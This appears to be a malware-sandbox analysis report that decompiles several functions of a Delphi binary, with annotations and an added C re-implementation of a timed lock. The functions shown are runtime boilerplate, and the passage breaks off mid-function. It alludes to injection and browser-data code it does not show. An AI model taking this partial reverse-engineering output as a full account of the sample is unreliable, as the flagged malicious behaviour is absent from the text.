• API String ID:
• Opcode ID: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
• Instruction ID: a6f3f7862a5743fd60f07ae337b35688b7a953487e66f12862dc3ba09d14b1d9
• Opcode Fuzzy Hash: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
• Instruction Fuzzy Hash: 8CC115A27106000BD714AE7DDD8476AB68A9BC5716F28827FF244EB3D6DB7CCD418388

Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 68%
                                                                                    			E0041F7A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                    				char _v8;
                                                                                    				struct _MEMORY_BASIC_INFORMATION _v36;
                                                                                    				short _v558;
                                                                                    				char _v564;
                                                                                    				intOrPtr _v568;
                                                                                    				char _v572;
                                                                                    				char _v576;
                                                                                    				char _v580;
                                                                                    				intOrPtr _v584;
                                                                                    				char _v588;
                                                                                    				void* _v592;
                                                                                    				char _v596;
                                                                                    				char _v600;
                                                                                    				char _v604;
                                                                                    				char _v608;
                                                                                    				intOrPtr _v612;
                                                                                    				char _v616;
                                                                                    				char _v620;
                                                                                    				char _v624;
                                                                                    				void* _v628;
                                                                                    				char _v632;
                                                                                    				void* _t64;
                                                                                    				intOrPtr _t65;
                                                                                    				long _t76;
                                                                                    				intOrPtr _t82;
                                                                                    				intOrPtr _t103;
                                                                                    				intOrPtr _t107;
                                                                                    				intOrPtr _t110;
                                                                                    				intOrPtr _t112;
                                                                                    				intOrPtr _t115;
                                                                                    				intOrPtr _t127;
                                                                                    				void* _t136;
                                                                                    				intOrPtr _t138;
                                                                                    				void* _t141;
                                                                                    				void* _t143;
                                                                                    
                                                                                    				_t136 = __edi;
                                                                                    				_t140 = _t141;
                                                                                    				_v632 = 0;
                                                                                    				_v596 = 0;
                                                                                    				_v604 = 0;
                                                                                    				_v600 = 0;
                                                                                    				_v8 = 0;
                                                                                    				_push(_t141);
                                                                                    				_push(0x41f9a6);
                                                                                    				_push( *[fs:eax]);
                                                                                    				 *[fs:eax] = _t141 + 0xfffffd8c;
                                                                                    				_t64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x14)) - 1;
                                                                                    				_t143 = _t64;
                                                                                    				if(_t143 < 0) {
                                                                                    					_t65 =  *0x4ba798; // 0x40e730
                                                                                    					E0040C9F0(_t65,  &_v8, _t140);
                                                                                    				} else {
                                                                                    					if(_t143 == 0) {
                                                                                    						_t107 =  *0x4ba670; // 0x40e738
                                                                                    						E0040C9F0(_t107,  &_v8, _t140);
                                                                                    					} else {
                                                                                    						if(_t64 == 7) {
                                                                                    							_t110 =  *0x4ba4d0; // 0x40e740
                                                                                    							E0040C9F0(_t110,  &_v8, _t140);
                                                                                    						} else {
                                                                                    							_t112 =  *0x4ba5c8; // 0x40e748
                                                                                    							E0040C9F0(_t112,  &_v8, _t140);
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				_t115 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x18));
                                                                                    				VirtualQuery( *( *((intOrPtr*)(_a4 - 4)) + 0xc),  &_v36, 0x1c);
                                                                                    				_t138 = _v36.State;
                                                                                    				if(_t138 == 0x1000 || _t138 == 0x10000) {
                                                                                    					_t76 = GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105);
                                                                                    					_t147 = _t76;
                                                                                    					if(_t76 == 0) {
                                                                                    						goto L12;
                                                                                    					} else {
                                                                                    						_v592 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
                                                                                    						_v588 = 5;
                                                                                    						E0040858C( &_v600, 0x105,  &_v558);
                                                                                    						E0041A418(_v600, _t115,  &_v596, _t136, _t138, _t147);
                                                                                    						_v584 = _v596;
                                                                                    						_v580 = 0x11;
                                                                                    						_v576 = _v8;
                                                                                    						_v572 = 0x11;
                                                                                    						_v568 = _t115;
                                                                                    						_v564 = 5;
                                                                                    						_push( &_v592);
                                                                                    						_t103 =  *0x4ba6e0; // 0x40e810
                                                                                    						E0040C9F0(_t103,  &_v604, _t140, 3);
                                                                                    						E0041F2A0(_t115, _v604, 1, _t136, _t138);
                                                                                    					}
                                                                                    				} else {
                                                                                    					L12:
                                                                                    					_v628 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
                                                                                    					_v624 = 5;
                                                                                    					_v620 = _v8;
                                                                                    					_v616 = 0x11;
                                                                                    					_v612 = _t115;
                                                                                    					_v608 = 5;
                                                                                    					_push( &_v628);
                                                                                    					_t82 =  *0x4ba67c; // 0x40e6d8
                                                                                    					E0040C9F0(_t82,  &_v632, _t140, 2);
                                                                                    					E0041F2A0(_t115, _v632, 1, _t136, _t138);
                                                                                    				}
                                                                                    				_pop(_t127);
                                                                                    				 *[fs:eax] = _t127;
                                                                                    				_push(0x41f9ad);
                                                                                    				E00407A20( &_v632);
                                                                                    				E00407A80( &_v604, 3);
                                                                                    				return E00407A20( &_v8);
                                                                                    			}

Instruction addresses, one per line of the C-code above in listing order (0x00000000 marks a line with no mapped instruction):
0x0041f7a0 0x0041f7a1 0x0041f7ad 0x0041f7b3 0x0041f7b9 0x0041f7bf 0x0041f7c5 0x0041f7ca
0x0041f7cb 0x0041f7d0 0x0041f7d3 0x0041f7df 0x0041f7df 0x0041f7e2 0x0041f7f0 0x0041f7f5
0x0041f7e4 0x0041f7e4 0x0041f7ff 0x0041f804 0x0041f7e6 0x0041f7e9 0x0041f80e 0x0041f813
0x0041f7eb 0x0041f81d 0x0041f822 0x0041f822 0x0041f7e9 0x0041f7e4 0x0041f82d 0x0041f840
0x0041f845 0x0041f84e 0x0041f86c 0x0041f871 0x0041f873 0x00000000 0x0041f879 0x0041f882
0x0041f888 0x0041f8a0 0x0041f8b1 0x0041f8bc 0x0041f8c2 0x0041f8cc 0x0041f8d2 0x0041f8d9
0x0041f8df 0x0041f8ec 0x0041f8f5 0x0041f8fa 0x0041f90c 0x0041f911 0x0041f915 0x0041f915
0x0041f91e 0x0041f924 0x0041f92e 0x0041f934 0x0041f93b 0x0041f941 0x0041f94e 0x0041f957
0x0041f95c 0x0041f96e 0x0041f973 0x0041f977 0x0041f97a 0x0041f97d 0x0041f988 0x0041f998
0x0041f9a5

                                                                                    APIs
                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F9A6), ref: 0041F840
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0041F9A6), ref: 0041F86C
                                                                                      • Part of subcall function 0040C9F0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040CA35
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileLoadModuleNameQueryStringVirtual
                                                                                    • String ID: 0@$8@$@@$H@
                                                                                    • API String ID: 902310565-4161625419
                                                                                    • Opcode ID: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                                                    • Instruction ID: bbc3c026f35d1d6bea3ad9012fddeafd4c483e803022796d8e8ef386e34d3195
                                                                                    • Opcode Fuzzy Hash: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                                                    • Instruction Fuzzy Hash: 69511874A04258DFCB10EF69CC89BCDB7F4AB48304F0042E6A808A7351D778AE85CF59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 88%
                                                                                    			E00406688(signed char* __eax, void* __edx, void* __eflags) {
                                                                                    				void* _t49;
                                                                                    				signed char _t56;
                                                                                    				intOrPtr _t57;
                                                                                    				signed char _t59;
                                                                                    				void* _t70;
                                                                                    				signed char* _t71;
                                                                                    				intOrPtr _t72;
                                                                                    				signed char* _t73;
                                                                                    
                                                                                    				_t70 = __edx;
                                                                                    				_t71 = __eax;
                                                                                    				_t72 =  *((intOrPtr*)(__eax + 0x10));
                                                                                    				while(1) {
                                                                                    					L1:
                                                                                    					 *_t73 = E00406B30(_t71);
                                                                                    					if( *_t73 != 0 || _t70 == 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					_t73[1] = 0;
                                                                                    					if(_t72 <= 0) {
                                                                                    						while(1) {
                                                                                    							L17:
                                                                                    							_t56 =  *_t71;
                                                                                    							if(_t56 == 0) {
                                                                                    								goto L1;
                                                                                    							}
                                                                                    							asm("lock cmpxchg [esi], edx");
                                                                                    							if(_t56 != _t56) {
                                                                                    								continue;
                                                                                    							} else {
                                                                                    								goto L19;
                                                                                    							}
                                                                                    							do {
                                                                                    								L19:
                                                                                    								_t73[4] = GetTickCount();
                                                                                    								E0040688C(_t71);
                                                                                    								_t57 =  *0x4bb8f8; // 0x4b9284
                                                                                    								 *((intOrPtr*)(_t57 + 0x10))();
                                                                                    								 *_t73 = 0 == 0;
                                                                                    								if(_t70 != 0xffffffff) {
                                                                                    									_t73[8] = GetTickCount();
                                                                                    									if(_t70 <= _t73[8] - _t73[4]) {
                                                                                    										_t70 = 0;
                                                                                    									} else {
                                                                                    										_t70 = _t70 - _t73[8] - _t73[4];
                                                                                    									}
                                                                                    								}
                                                                                    								if( *_t73 == 0) {
                                                                                    									do {
                                                                                    										asm("lock cmpxchg [esi], edx");
                                                                                    									} while ( *_t71 !=  *_t71);
                                                                                    									_t73[1] = 1;
                                                                                    								} else {
                                                                                    									while(1) {
                                                                                    										_t59 =  *_t71;
                                                                                    										if((_t59 & 0x00000001) != 0) {
                                                                                    											goto L29;
                                                                                    										}
                                                                                    										asm("lock cmpxchg [esi], edx");
                                                                                    										if(_t59 != _t59) {
                                                                                    											continue;
                                                                                    										}
                                                                                    										_t73[1] = 1;
                                                                                    										goto L29;
                                                                                    									}
                                                                                    								}
                                                                                    								L29:
                                                                                    							} while (_t73[1] == 0);
                                                                                    							if( *_t73 != 0) {
                                                                                    								_t71[8] = GetCurrentThreadId();
                                                                                    								_t71[4] = 1;
                                                                                    							}
                                                                                    							goto L32;
                                                                                    						}
                                                                                    						continue;
                                                                                    					}
                                                                                    					_t73[4] = GetTickCount();
                                                                                    					_t73[0xc] = 0;
                                                                                    					if(_t72 <= 0) {
                                                                                    						L13:
                                                                                    						if(_t70 == 0xffffffff) {
                                                                                    							goto L17;
                                                                                    						}
                                                                                    						_t73[8] = GetTickCount();
                                                                                    						_t49 = _t73[8] - _t73[4];
                                                                                    						if(_t70 > _t49) {
                                                                                    							_t70 = _t70 - _t49;
                                                                                    							goto L17;
                                                                                    						}
                                                                                    						 *_t73 = 0;
                                                                                    						break;
                                                                                    					}
                                                                                    					L5:
                                                                                    					L5:
                                                                                    					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
                                                                                    						goto L8;
                                                                                    					} else {
                                                                                    						 *_t73 = 0;
                                                                                    					}
                                                                                    					break;
                                                                                    					L8:
                                                                                    					if( *_t71 > 1) {
                                                                                    						goto L13;
                                                                                    					}
                                                                                    					if( *_t71 != 0) {
                                                                                    						L12:
                                                                                    						E00406368( &(_t73[0xc]));
                                                                                    						_t72 = _t72 - 1;
                                                                                    						if(_t72 > 0) {
                                                                                    							goto L5;
                                                                                    						}
                                                                                    						goto L13;
                                                                                    					}
                                                                                    					asm("lock cmpxchg [esi], edx");
                                                                                    					if(0 != 0) {
                                                                                    						goto L12;
                                                                                    					}
                                                                                    					_t71[8] = GetCurrentThreadId();
                                                                                    					_t71[4] = 1;
                                                                                    					 *_t73 = 1;
                                                                                    					break;
                                                                                    				}
                                                                                    				L32:
                                                                                    				return  *_t73 & 0x000000ff;
                                                                                    			}
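The listing for E00406688 above has the shape of a compiler runtime's timed, recursive lock rather than sample-specific logic: a `lock cmpxchg` on the lock word at `[esi]`, a spin phase bounded by the count at `[esi+0x10]`, a blocking phase whose remaining budget is re-derived from two GetTickCount() reads, the 0xffffffff "wait forever" sentinel, and the owner thread id and recursion count stored at `[esi+8]` and `[esi+4]` on success. Recognizing it as runtime boilerplate lets an analyst skip it and spend time on the injection and browser-data code flagged in the summary. The following is an added example, not code from the report or from the sample: a portable C re-implementation of that algorithm. The field meanings, the role of E00406B30 (owner re-entry check), the role of E00406368 (spin-wait helper), the 1 ms nanosleep standing in for the runtime's wait object, and the caller-supplied thread id in place of GetCurrentThreadId() are all assumptions made for the example.

```c
#define _POSIX_C_SOURCE 200809L
#include <sched.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <time.h>

/* 0xffffffff, the "wait forever" sentinel the listing compares _t70 against. */
#define LOCK_INFINITE 0xffffffffu

/* Field layout follows the offsets the decompiled code touches; the meaning
   assigned to each field is an assumption, not something the report states:
   [esi]      lock word, target of lock cmpxchg (0 = free, 1 = held)
   [esi+4]    recursion count
   [esi+8]    owner thread id (GetCurrentThreadId() in the listing)
   [esi+0x10] spin count */
typedef struct {
    atomic_uint lock_word;
    unsigned    recursion;
    uint32_t    owner_tid;
    int         spin_count;
} timed_lock_t;

/* Millisecond tick source standing in for GetTickCount(). Only differences
   are used, so 32-bit wrap-around is harmless, as in the original. */
static uint32_t ticks_ms(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint32_t)((uint64_t)ts.tv_sec * 1000u + (uint64_t)ts.tv_nsec / 1000000u);
}

/* One atomic 0 -> 1 attempt: the lock cmpxchg [esi], edx in the listing. */
static bool try_cas(timed_lock_t *m) {
    unsigned expected = 0;
    return atomic_compare_exchange_strong(&m->lock_word, &expected, 1u);
}

/* Remaining budget after a wait, recomputed the way the listing does:
   timeout > elapsed ? timeout - elapsed : 0 (never touched when infinite). */
static uint32_t remaining_ms(uint32_t timeout_ms, uint32_t start) {
    if (timeout_ms == LOCK_INFINITE) return LOCK_INFINITE;
    uint32_t elapsed = ticks_ms() - start;
    return timeout_ms > elapsed ? timeout_ms - elapsed : 0;
}

/* Acquire with a millisecond timeout. tid is supplied by the caller instead of
   being read from GetCurrentThreadId() so the contended path can be exercised
   without threads. Returns true on success, false when the budget runs out. */
bool timed_lock_enter(timed_lock_t *m, uint32_t tid, uint32_t timeout_ms) {
    /* Re-entry by the current owner: bump the count and succeed at once
       (assumed to be what the E00406B30 call checks before the loop). */
    if (atomic_load(&m->lock_word) != 0 && m->owner_tid == tid) {
        m->recursion++;
        return true;
    }
    uint32_t start = ticks_ms();

    /* Phase 1: spin_count CAS attempts with a yield between them, giving up
       early once the deadline has passed (E00406368 in the listing). */
    for (int i = 0; i < m->spin_count; i++) {
        if (try_cas(m)) goto acquired;
        if (remaining_ms(timeout_ms, start) == 0) return false;
        sched_yield();
    }

    /* Phase 2: block and retry. The original waits on a runtime wait object
       and re-derives the remaining time from two GetTickCount() reads; a
       1 ms nanosleep stands in for that wait here. */
    for (;;) {
        if (try_cas(m)) goto acquired;
        if (remaining_ms(timeout_ms, start) == 0) return false;
        struct timespec nap = { 0, 1000000L };
        nanosleep(&nap, NULL);
    }

acquired:
    m->owner_tid = tid;
    m->recursion = 1;
    return true;
}

/* Release one level; the lock word is cleared only when the count hits zero.
   A release by a non-owner is ignored. */
void timed_lock_leave(timed_lock_t *m, uint32_t tid) {
    if (atomic_load(&m->lock_word) == 0 || m->owner_tid != tid) return;
    if (--m->recursion == 0) {
        m->owner_tid = 0;
        atomic_store(&m->lock_word, 0u);
    }
}

int main(void) {
    timed_lock_t m = { 0 };
    m.spin_count = 8;
    timed_lock_enter(&m, 1, LOCK_INFINITE);          /* tid 1 takes the lock */
    uint32_t t0 = ticks_ms();
    bool got = timed_lock_enter(&m, 2, 50);          /* tid 2 contends, 50 ms budget */
    printf("tid 2 contended acquire: %s after %u ms\n",
           got ? "ok" : "timed out", ticks_ms() - t0);
    timed_lock_leave(&m, 1);
    printf("tid 2 after release: %s\n",
           timed_lock_enter(&m, 2, 0) ? "ok" : "timed out");
    return 0;
}
```

The two-phase structure (bounded spin, then blocking wait with the budget recomputed from tick deltas after every wake-up) is what produces the GetTickCount / lock cmpxchg / GetCurrentThreadId triple seen in the listing; when those three APIs appear together in a small function with a 0xffffffff comparison, it is almost always a lock primitive and not something the sample author wrote.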

Instruction addresses, one per line of the C-code above in listing order (0x00000000 marks a line with no mapped instruction):
0x0040668f 0x00406691 0x00406693 0x00406696 0x00406696 0x0040669d 0x004066a4 0x00000000
0x00000000 0x004066b2 0x004066b9 0x00406751 0x00406751 0x00406751 0x00406755 0x00000000
0x00000000 0x00406760 0x00406766 0x00000000 0x00000000 0x00000000 0x00000000 0x00406768
0x00406768 0x0040676d 0x00406773 0x0040677a 0x00406784 0x00406789 0x00406790 0x00406797
0x004067a5 0x004067b3 0x004067a7 0x004067af 0x004067af 0x004067a5 0x004067b9 0x004067db
0x004067e4 0x004067e8 0x004067ec 0x00000000 0x004067bb 0x004067bb 0x004067c0 0x00000000
0x00000000 0x004067cc 0x004067d2 0x00000000 0x00000000 0x004067d4 0x00000000 0x004067d4
0x004067bb
                                                                                    0x004067f1
                                                                                    0x004067f1
                                                                                    0x00406800
                                                                                    0x00406807
                                                                                    0x0040680a
                                                                                    0x0040680a
                                                                                    0x00000000
                                                                                    0x00406800
                                                                                    0x00000000
                                                                                    0x00406751
                                                                                    0x004066c4
                                                                                    0x004066ca
                                                                                    0x004066d0
                                                                                    0x0040672c
                                                                                    0x0040672f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406736
                                                                                    0x0040673e
                                                                                    0x00406744
                                                                                    0x0040674f
                                                                                    0x00000000
                                                                                    0x0040674f
                                                                                    0x00406746
                                                                                    0x00000000
                                                                                    0x00406746
                                                                                    0x00000000
                                                                                    0x004066d2
                                                                                    0x004066d5
                                                                                    0x00000000
                                                                                    0x004066e4
                                                                                    0x004066e4
                                                                                    0x004066e4
                                                                                    0x00000000
                                                                                    0x004066ed
                                                                                    0x004066f0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004066f5
                                                                                    0x0040671e
                                                                                    0x00406722
                                                                                    0x00406727
                                                                                    0x0040672a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040672a
                                                                                    0x004066fe
                                                                                    0x00406704
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040670b
                                                                                    0x0040670e
                                                                                    0x00406715
                                                                                    0x00000000
                                                                                    0x00406715
                                                                                    0x00406811
                                                                                    0x0040681c

                                                                                    APIs
                                                                                      • Part of subcall function 00406B30: GetCurrentThreadId.KERNEL32 ref: 00406B33
                                                                                    • GetTickCount.KERNEL32 ref: 004066BF
                                                                                    • GetTickCount.KERNEL32 ref: 004066D7
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00406706
                                                                                    • GetTickCount.KERNEL32 ref: 00406731
                                                                                    • GetTickCount.KERNEL32 ref: 00406768
                                                                                    • GetTickCount.KERNEL32 ref: 00406792
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00406802
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CountTick$CurrentThread
                                                                                    • String ID:
                                                                                    • API String ID: 3968769311-0
                                                                                    • Opcode ID: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                                                    • Instruction ID: 4198438d609b3d92ee1caba3903e9c970ac06421e97b93dd9799f90313ce3de1
                                                                                    • Opcode Fuzzy Hash: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                                                    • Instruction Fuzzy Hash: 664182712083419ED721AE3CC58431BBAD5AF80358F16C93ED4DA973C1EB7988958756
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 80%
                                                                                     			E004971AC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                     				// Annotation: the shape of this routine matches the Delphi RTL constructor
                                                                                     				// TThread.Create(CreateSuspended, ReservedStackSize): __ecx = CreateSuspended,
                                                                                     				// _a4 = reserved stack size, _t66 = the object being constructed. The thread is
                                                                                     				// created inside this process, suspended, and resumed later by the caller; on its
                                                                                     				// own this is normal runtime code, not remote-thread injection.
                                                                                     				char _v5;
                                                                                     				char _v12;
                                                                                     				char _v16;
                                                                                     				char _v20;
                                                                                     				void* _t23;
                                                                                     				char _t29;
                                                                                     				void* _t49;   // used below but left undeclared by the decompiler
                                                                                     				void* _t50;
                                                                                     				intOrPtr _t55;
                                                                                     				char _t57;
                                                                                     				intOrPtr _t59;
                                                                                     				void* _t64;
                                                                                     				void* _t66;
                                                                                     				void* _t68;
                                                                                     				void* _t69;
                                                                                     				intOrPtr _t70;
                                                                                     
                                                                                     				_t64 = __edi;
                                                                                     				_t57 = __edx;
                                                                                     				_t50 = __ecx;
                                                                                     				_t68 = _t69;
                                                                                     				_t70 = _t69 + 0xfffffff0;
                                                                                     				_v20 = 0;
                                                                                     				if(__edx != 0) {
                                                                                     					_t70 = _t70 + 0xfffffff0;
                                                                                     					_t23 = E004062B0(_t23, _t68);   // allocate the object (Delphi class-construction prologue)
                                                                                     				}
                                                                                     				_t49 = _t50;
                                                                                     				_v5 = _t57;
                                                                                     				_t66 = _t23;
                                                                                     				_push(_t68);
                                                                                     				_push(0x4972a5);
                                                                                     				_push( *[fs:eax]);
                                                                                     				 *[fs:eax] = _t70;   // install the try/except frame used for the error path below
                                                                                     				E00405CB8(0);
                                                                                     				_t3 = _t66 + 0x2c; // 0x266461
                                                                                     				 *(_t66 + 0xf) =  *_t3 & 0x000000ff ^ 0x00000001;   // +0xf: Suspended := not (+0x2c: wraps an existing thread)
                                                                                     				if(_t50 == 0 ||  *(_t66 + 0x2c) != 0) {
                                                                                     					_t29 = 0;
                                                                                     				} else {
                                                                                     					_t29 = 1;
                                                                                     				}
                                                                                     				 *((char*)(_t66 + 0xd)) = _t29;   // +0xd: CreateSuspended and not external thread
                                                                                     				if( *(_t66 + 0x2c) != 0) {
                                                                                     					// Wrapping the calling thread: record its pseudo-handle and id, create nothing.
                                                                                     					 *((intOrPtr*)(_t66 + 8)) = GetCurrentThread();
                                                                                     					 *((intOrPtr*)(_t66 + 4)) = GetCurrentThreadId();
                                                                                     				} else {
                                                                                     					// E004078E0 wraps CreateThread (see APIs below). E004970B8 is the thread entry,
                                                                                     					// _t66 + 4 receives the new thread id, and the thread starts suspended.
                                                                                     					if(_a4 == 0) {
                                                                                     						_t12 = _t66 + 4; // 0x495548
                                                                                     						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, 0, _t12, 4, _t66);   // 4 = CREATE_SUSPENDED
                                                                                     					} else {
                                                                                     						_t9 = _t66 + 4; // 0x495548
                                                                                     						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, _a4, _t9, 0x10004, _t66);   // CREATE_SUSPENDED | STACK_SIZE_PARAM_IS_A_RESERVATION, _a4 = stack size
                                                                                     					}
                                                                                     					if( *((intOrPtr*)(_t66 + 8)) == 0) {
                                                                                     						// CreateThread failed: format GetLastError() into a message and raise an exception.
                                                                                     						E0041DFB0(GetLastError(), _t49, 0, _t66);
                                                                                     						_v16 = _v20;
                                                                                     						_v12 = 0x11;
                                                                                     						_t55 =  *0x4ba740; // 0x40ea6c
                                                                                     						E0041F35C(_t49, _t55, 1, _t64, _t66, 0,  &_v16);
                                                                                     						E0040711C();
                                                                                     					}
                                                                                     				}
                                                                                     				_pop(_t59);
                                                                                     				 *[fs:eax] = _t59;   // remove the exception frame
                                                                                     				_push(0x4972ac);
                                                                                     				return E00407A20( &_v20);
                                                                                     			}
                                                                                    0x004971ac
                                                                                    0x004971ac
                                                                                    0x004971ac
                                                                                    0x004971ad
                                                                                    0x004971af
                                                                                    0x004971b6
                                                                                    0x004971bb
                                                                                    0x004971bd
                                                                                    0x004971c0
                                                                                    0x004971c0
                                                                                    0x004971c5
                                                                                    0x004971c7
                                                                                    0x004971ca
                                                                                    0x004971ce
                                                                                    0x004971cf
                                                                                    0x004971d4
                                                                                    0x004971d7
                                                                                    0x004971de
                                                                                    0x004971e3
                                                                                    0x004971e9
                                                                                    0x004971ee
                                                                                    0x004971f6
                                                                                    0x004971fa
                                                                                    0x004971fa
                                                                                    0x004971fa
                                                                                    0x004971fc
                                                                                    0x00497203
                                                                                    0x00497284
                                                                                    0x0049728c
                                                                                    0x00497205
                                                                                    0x00497209
                                                                                    0x0049722c
                                                                                    0x0049723e
                                                                                    0x0049720b
                                                                                    0x00497211
                                                                                    0x00497224
                                                                                    0x00497224
                                                                                    0x00497245
                                                                                    0x00497251
                                                                                    0x00497259
                                                                                    0x0049725c
                                                                                    0x00497266
                                                                                    0x00497273
                                                                                    0x00497278
                                                                                    0x00497278
                                                                                    0x00497245
                                                                                    0x00497291
                                                                                    0x00497294
                                                                                    0x00497297
                                                                                    0x004972a4

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,004972A5,?,00495544,00000000), ref: 00497247
                                                                                      • Part of subcall function 004078E0: CreateThread.KERNEL32 ref: 0040793A
                                                                                    • GetCurrentThread.KERNEL32 ref: 0049727F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00497287
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Thread$Current$CreateErrorLast
                                                                                    • String ID: 0@G$XtI$l@
                                                                                    • API String ID: 3539746228-385768319
                                                                                    • Opcode ID: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                                                    • Instruction ID: 1159262e71bebd7e921a745d602ab6fc0c684f98ff6f66721209a3575415716a
                                                                                    • Opcode Fuzzy Hash: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                                                    • Instruction Fuzzy Hash: 2B31E2309287449EDB10EBB68C427AB7FE49F09304F40C87EE455973C1DA3CA545C799
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 36%
                                                                                     			E00406424(void* __edx) {
                                                                                     				// Annotation: this is consistent with the Delphi RTL start-up routine that
                                                                                     				// determines the L1 cache line size (System.GetCacheLineSize). It probes
                                                                                     				// GetLogicalProcessorInformation and falls back to 64 (0x40) bytes. That API is
                                                                                     				// ordinary runtime initialisation here and is not, by itself, a VM or sandbox check;
                                                                                     				// the firmware-table query flagged in the signatures is a different routine.
                                                                                     				signed int _v8;      // result: cache line size in bytes
                                                                                     				intOrPtr _v12;       // heap buffer holding the SYSTEM_LOGICAL_PROCESSOR_INFORMATION array
                                                                                     				char _v16;           // ReturnLength (bytes), in/out parameter of both API calls
                                                                                     				char* _t23;
                                                                                     				intOrPtr _t29;
                                                                                     				intOrPtr _t39;
                                                                                     				void* _t41;
                                                                                     				void* _t43;
                                                                                     				intOrPtr _t44;
                                                                                     
                                                                                     				_t41 = _t43;
                                                                                     				_t44 = _t43 + 0xfffffff4;
                                                                                     				_v16 = 0;
                                                                                     				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
                                                                                     					L10:
                                                                                     					_v8 = 0x40;   // default line size: 64 bytes (API absent, sizing call failed, or no L1 record)
                                                                                     					goto L11;
                                                                                     				} else {
                                                                                     					_t23 =  &_v16;
                                                                                     					_push(_t23);
                                                                                     					_push(0);
                                                                                     					L00403808();   // GetLogicalProcessorInformation(NULL, &_v16): sizing call via the import thunk
                                                                                     					if(_t23 != 0 || GetLastError() != 0x7a) {   // 0x7a = ERROR_INSUFFICIENT_BUFFER is the expected outcome
                                                                                     						goto L10;
                                                                                     					} else {
                                                                                     						_v12 = E004053F0(_v16);   // allocate _v16 bytes (likely Delphi GetMem)
                                                                                     						_push(_t41);
                                                                                     						_push(E004064D2);
                                                                                     						_push( *[fs:edx]);
                                                                                     						 *[fs:edx] = _t44;   // try/finally frame protecting the buffer
                                                                                     						_push( &_v16);
                                                                                     						_push(_v12);
                                                                                     						L00403808();   // GetLogicalProcessorInformation(_v12, &_v16): fill call
                                                                                     						_t29 = _v12;
                                                                                     						if(_v16 <= 0) {
                                                                                     							L8:
                                                                                     							_pop(_t39);
                                                                                     							 *[fs:eax] = _t39;
